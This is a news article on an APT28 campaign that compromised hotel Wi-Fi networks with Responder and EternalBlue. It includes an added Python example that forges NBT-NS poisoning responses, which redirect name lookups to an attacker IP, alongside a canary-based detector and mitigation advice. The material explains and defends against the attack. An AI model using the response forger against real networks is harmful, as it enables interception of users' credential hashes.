Researchers have "moderate" confidence the program is being run by APT28.

Travelers to Europe and the Middle East should be aware of an ongoing malware campaign that targets hotel and hospitality Wi-Fi networks and is being used to harvest guest and corporate information.

FireEye researchers have “moderate” confidence that the campaign is run by the Russian group APT28, citing malicious documents found in these attacks that were used to install the group's signature malware, Gamefish. The document is delivered by spearphishing and is made to look like a routine hotel reservation form.

Additionally, FireEye said APT28 has incorporated several new techniques into these attacks, including use of the EternalBlue SMB exploit that powered the WannaCry and NotPetya ransomworm outbreaks of May and June this year.

“Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels,” FireEye said.

Once embedded in the target system, the malware deployed Responder, an open-source tool that listens for NBT-NS (UDP/137) name-resolution broadcasts sent by victim computers as they attempt to reach network resources. Responder then answers as if it were that resource, causing the victim's computer to authenticate to the attacker-controlled machine and hand over its username along with its NTLM challenge-response (the so-called NetNTLM hash). APT28 then used these credentials to escalate privileges on the compromised network. A useful check for defenders follows from how the poisoning works: a broadcast query for a name that does not exist on the LAN should never receive a reply, so any answer to such a "canary" name is a strong indicator that a tool like Responder is active.
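To make the exchange above concrete, here is an added example (not code from the article, from FireEye, or from the Responder project) that builds the NBT-NS packets on both sides of the poisoning: the victim's broadcast name query, the poisoner's forged positive name query response that redirects the name to its own IP, and the victim-side parser that would act on it. It also implements the canary check described above. Packet layouts follow RFC 1002; the host names, transaction IDs and IP addresses are constructed for the example, and no sockets are opened.

```python
import socket
import struct

NBNS_PORT = 137          # NBT-NS listens on UDP/137
TYPE_NB = 0x0020         # NetBIOS general name service resource record
CLASS_IN = 0x0001
FLAGS_BCAST_QUERY = 0x0110   # opcode QUERY, RD=1, B=1 (broadcast), as Windows sends
FLAGS_POS_RESPONSE = 0x8500  # QR=1, opcode QUERY, AA=1, RD=1


def encode_nb_name(name: str, suffix: int = 0x20) -> bytes:
    """RFC 1002 first-level encoding: 16 raw bytes -> 32 chars 'A'..'P', as one label."""
    if len(name) > 15 or not name.isascii():
        raise ValueError("NetBIOS names are at most 15 ASCII characters")
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    enc = bytearray()
    for b in raw:
        enc.append(0x41 + (b >> 4))
        enc.append(0x41 + (b & 0x0F))
    return bytes([32]) + bytes(enc) + b"\x00"


def decode_nb_name(label: bytes) -> tuple:
    """Inverse of encode_nb_name; returns (name, suffix)."""
    if len(label) < 34 or label[0] != 32 or label[33] != 0:
        raise ValueError("malformed NetBIOS name label")
    enc = label[1:33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_name_query(txid: int, name: str) -> bytes:
    """Victim side: the broadcast a Windows host sends when it cannot resolve a name."""
    header = struct.pack("!HHHHHH", txid, FLAGS_BCAST_QUERY, 1, 0, 0, 0)
    return header + encode_nb_name(name) + struct.pack("!HH", TYPE_NB, CLASS_IN)


def parse_name_query(pkt: bytes) -> tuple:
    """Returns (txid, name, suffix) from a name query; rejects responses and odd packets."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question NBT-NS query")
    name, suffix = decode_nb_name(pkt[12:46])
    qtype, qclass = struct.unpack("!HH", pkt[46:50])
    if qtype != TYPE_NB or qclass != CLASS_IN:
        raise ValueError("unexpected question type/class")
    return txid, name, suffix


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 165) -> bytes:
    """Poisoner side: answer whatever name was asked for with the attacker's own IP.
    This is the forgery a tool like Responder sends; it reuses the query's transaction ID."""
    txid, name, suffix = parse_name_query(query)
    header = struct.pack("!HHHHHH", txid, FLAGS_POS_RESPONSE, 0, 1, 0, 0)
    rr = encode_nb_name(name, suffix) + struct.pack("!HHIH", TYPE_NB, CLASS_IN, ttl, 6)
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(attacker_ip)  # NB_FLAGS: B-node, unique
    return header + rr + rdata


def parse_name_response(pkt: bytes) -> tuple:
    """Victim side: returns (txid, name, ip) the host would now connect (and authenticate) to."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a positive NBT-NS response")
    name, _suffix = decode_nb_name(pkt[12:46])
    rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[46:56])
    if rtype != TYPE_NB or rclass != CLASS_IN or rdlen < 6:
        raise ValueError("unexpected answer record")
    _nb_flags, ip = struct.unpack("!H4s", pkt[56:62])
    return txid, name, socket.inet_ntoa(ip)


def detect_poisoner(canary_name: str, responses) -> list:
    """Canary check: the caller broadcast a query for a name that does not exist on the LAN.
    `responses` is an iterable of (source_ip, packet) seen on UDP/137 afterwards. Any positive
    answer for the canary name is a poisoner; returns [(source_ip, advertised_ip), ...]."""
    hits = []
    for src_ip, pkt in responses:
        try:
            _txid, name, advertised_ip = parse_name_response(pkt)
        except (ValueError, struct.error):
            continue
        if name == canary_name.upper():
            hits.append((src_ip, advertised_ip))
    return hits


if __name__ == "__main__":
    # Constructed exchange: victim asks for FILESRV01, poisoner at 10.0.0.66 answers.
    query = build_name_query(0x1234, "FILESRV01")
    forged = build_poisoned_response(query, "10.0.0.66")
    print(parse_name_response(forged))  # victim now believes FILESRV01 is 10.0.0.66
    canary_q = build_name_query(0x4242, "NOSUCHHOST77")
    print(detect_poisoner("NOSUCHHOST77", [("10.0.0.66", build_poisoned_response(canary_q, "10.0.0.66"))]))
```

The victim never checks who answered, which is the whole weakness: a name that cannot be resolved by DNS falls through to LLMNR and NBT-NS broadcasts, and the first reply wins. Disabling NBT-NS and LLMNR on managed endpoints removes the fallback entirely; where that is not possible, periodically broadcasting a canary name and alerting on any answer is a cheap, high-signal detection.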

“Travelers must be aware of the threats posed when traveling – especially to foreign countries – and take extra precautions to secure their systems and data. Publicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible,” FireEye concluded.